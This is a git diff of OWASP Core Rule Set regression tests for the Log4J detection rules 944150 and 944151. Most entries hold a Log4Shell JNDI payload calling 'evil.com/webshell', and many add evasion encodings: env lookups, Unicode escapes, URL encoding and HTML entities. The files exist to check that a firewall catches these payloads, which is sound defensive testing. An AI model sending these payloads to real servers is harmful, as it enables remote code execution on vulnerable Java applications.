"127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" 
+ Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - 
test_title: 944150-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + 
output: + log_contains: id "944150" + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + 
version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id 
"944150" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 71a8e0235..9a57d7419 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml 
@@ -3,454 +3,428 @@ # 944151 should detect the same things as 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944151.yaml" description: "Description" +rule_id: 944151 tests: - - test_title: 944151-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" 
+ Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - 
test_title: 944151-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + 
output: + log_contains: id "944151" + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-19 + - input: + dest_addr: "127.0.0.1" + 